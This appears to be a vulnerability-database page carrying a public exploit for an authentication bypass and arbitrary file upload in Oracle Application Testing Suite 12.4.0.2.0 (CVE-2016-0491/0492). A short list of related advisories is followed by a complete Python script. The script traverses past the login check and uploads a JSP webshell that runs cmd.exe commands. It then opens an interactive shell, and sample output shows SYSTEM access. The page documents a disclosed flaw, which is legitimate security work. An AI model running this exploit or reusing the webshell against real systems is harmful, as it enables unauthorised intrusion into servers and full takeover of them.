Oracle Application Testing Suite (ATS) 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload

🗓️ 13 Apr 2016 00:00:00Reported by Zhou YuType

Oracle ATS 12.4.0.2.0 Authentication Bypass Arbitrary File Upload Remote Exploi

Reporter	Title	Published	Views	Family All 26
0day.today	Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload	13 Apr 201600:00	–	zdt
0day.today	Oracle Application Testing Suite (ATS) - Arbitrary File Upload (Metasploit)	25 May 201600:00	–	zdt
Circl	CVE-2016-0491	13 Apr 201600:00	–	circl
Circl	CVE-2016-0492	13 Apr 201600:00	–	circl
CNVD	Unspecified Vulnerability in Oracle Enterprise Manager Grid Control Oracle Application Testing Suite Test Manager for Web Apps Component (CNVD-2016-00668)	23 Jan 201600:00	–	cnvd
CNVD	Unspecified Vulnerability in Oracle Enterprise Manager Grid Control Oracle Application Testing Suite Test Manager for Web Apps Component (CNVD-2016-00669)	23 Jan 201600:00	–	cnvd
Check Point Advisories	Oracle Application Testing Suite UploadFileAction fileType Directory Traversal (CVE-2016-0491)	21 Mar 201600:00	–	checkpoint_advisories
Check Point Advisories	Oracle Application Testing Suite Authentication Bypass (CVE-2016-0492)	19 Jun 201600:00	–	checkpoint_advisories
CVE	CVE-2016-0491	21 Jan 201602:00	–	cve
CVE	CVE-2016-0492	21 Jan 201602:00	–	cve

# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit
# Exploit Author: Zhou Yu <[email protected] >
# Vendor Homepage: http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/oem/downloads/apptesting-downloads-1983826.html?ssSourceSiteId=otncn
# Version: 12.4.0.2.0
# Tested on: Win7 SP1 32-bit
# CVE : CVE-2016-0492 and CVE-2016-0491

import urllib2
import urllib

ip = '192.168.150.239'
port = 8088

url = "http://" + ip + ":" + str(port)
#bypass authentication
url = url+"/olt/Login.do/../../olt/UploadFileUpload.do"
request = urllib2.Request(url)

webshell_content='''
<%@ page import="java.util.*,java.io.*"  %>
    <%
        if (request.getParameter("{cmd}") != null) {{
            Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}"));
            OutputStream os = p.getOutputStream();
            InputStream in = p.getInputStream();
            DataInputStream dis = new DataInputStream(in);
            String disr = dis.readLine();
            while (disr != null) {{
                out.println(disr);
                disr = dis.readLine();
            }}
        }}
    %>
'''
boundary = "---------------------------7e01e2240a1e"
request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary)
post_data = "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n"
post_data = post_data + "\r\n.jsp\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"
post_data = post_data + "\r\nwebshell.jsp\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n"
post_data = post_data + "\r\n\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n"
post_data = post_data + "\r\n\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n"
post_data = post_data + "\r\n\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n"
post_data = post_data + "\r\n*\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n"
post_data = post_data + "Content-Type: text/plain\r\n"
post_data = post_data + "\r\n" + webshell_content +"\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n"
post_data = post_data + "\r\nDefault\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n"
post_data = post_data + "\r\n.\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n"
post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n"
post_data = post_data + "--" + boundary + "--"+"\r\n"

try:
    request.add_data(post_data)
    response = urllib2.urlopen(request)
    if response.code == 200 :
        print "[+]upload done!"
        webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp"
        print "[+]wait a moment,detecting whether the webshell exists..."
        if urllib2.urlopen(webshellurl).code == 200 :
            print "[+]upload webshell successfully!"
            print "[+]return a cmd shell"
            while True:
                cmd = raw_input(">>: ")
                if cmd == "exit" :
                    break
                print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip()
        else:
            print "[-]attack fail!"
    else:
        print "[-]attack fail!"
except Exception as e:
    print "[-]attack fail!"

'''
#run the exploit and get a cmd shell
root@kali:~/Desktop# python exploit.py 
[+]upload done!
[+]wait a moment,detecting whether the webshell exists...
[+]upload webshell successfully!
[+]return a cmd shell
>>: whoami
nt authority\system


>>: exit
'''

13 Apr 2016 00:00Current

7.5High risk

Vulners AI Score7.5

CVSS 26.4

EPSS0.91458